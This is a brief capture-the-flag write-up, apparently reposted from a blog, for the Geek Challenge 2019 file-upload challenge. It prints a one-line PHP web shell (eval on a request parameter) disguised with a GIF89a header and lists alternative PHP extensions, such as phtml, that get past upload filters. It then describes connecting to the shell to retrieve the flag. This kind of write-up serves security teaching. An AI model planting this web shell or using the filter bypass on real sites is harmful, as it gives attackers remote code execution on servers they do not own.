当前位置:网站首页>Geek challenge 2019 upload 1
Geek challenge 2019 upload 1
2022-04-21 09:07:00 【xinjuun】
Or the problem of file upload , Upload a sentence written by the Trojan horse and change the suffix to jpg Get the papers , You will be prompted that the file contains `<? I can't pass it on , So change the Trojan horse to :
GIF89a? <script language="php">eval($_REQUEST[123])</script>
open burp, Modify file suffix by capturing package ,
Find out php Can't upload ,
The general file suffix is :
php2, php3, php4, php5, phps, pht, phtm, phtml
Modify the suffix here as :phtml It can be uploaded normally
But the image saving address is not returned after uploading , Generally, uploaded pictures are saved in upload, So here, too , Connect successfully with ant sword , find flag file
版权声明
本文为[xinjuun]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204210901289558.html
边栏推荐
- 网易博客居然要关了,我写的文章啊!
- 1166: 实数取整(指针专题)
- [GYCTF2020]Blacklist
- [appium] use the simulator to realize the business functions of Youdao cloud app - add, search, modify and delete
- [ctf.show.reverse] 逆向AK赛 EasyDSE
- 1164: 字符串加密
- Open3d读写pcd点云文件
- 深蓝-视觉slam-第六节习题
- sql 一般模糊查询语句,查询表T , 表T2的SEQ是条件,请问模糊查询 如何 能够匹配表T2的SEQ多个字符?
- 2022年山东省安全员C证考试题及模拟考试
猜你喜欢
Maya 基础教程 、 基础操作讲解
PyS1:概述
Intranet penetration - proxy penetration - rights lifting - injection - MSF Middleware - domain penetration - log clearing - learning resources
【ACM】131. Split palindrome string
Simulated 100 questions and simulated examination of Shanghai safety officer C certificate examination in 2022
二叉树知识
LDO系列--PSRR
【CVPR 2020】PointASNL :Robust Point Clouds Processing using Nonlocal Neural Networks
原生与H5混合式开发详解
postman测试Excel文件导入导出功能
随机推荐
Garbage collection mechanism
Integrating sdl2 with ffmpeg to realize texture rendering of random blocks
Analyse de l'API d'interface de numéro personnel du robot Wechat PC
Major programming languages and applications in 2022
1169: 大整数(指针专题)
Handler异步消息传递机制(一)Handler常用基本用法
1168: 账单(指针专题)
Penetration practice - no echo rce thinkphp5 getshell
C language counting and sorting
【CVPR 2020】PointASNL :Robust Point Clouds Processing using Nonlocal Neural Networks
kotlin 协程 lanch 详解
ue5 小知识点 动画蓝图接口 不能在editor中复制新的
最新系统漏洞--OMERO.web跨站脚本漏洞
2022 tea artist (primary) examination questions and online simulation examination
Redisson introduction and integration
C 100 points secret script sduwh
Characteristics of interactive multimedia applications
1166: 实数取整(指针专题)
基于Ansible实现Apache Doris快速部署运维指南
1149: 组合三位数之二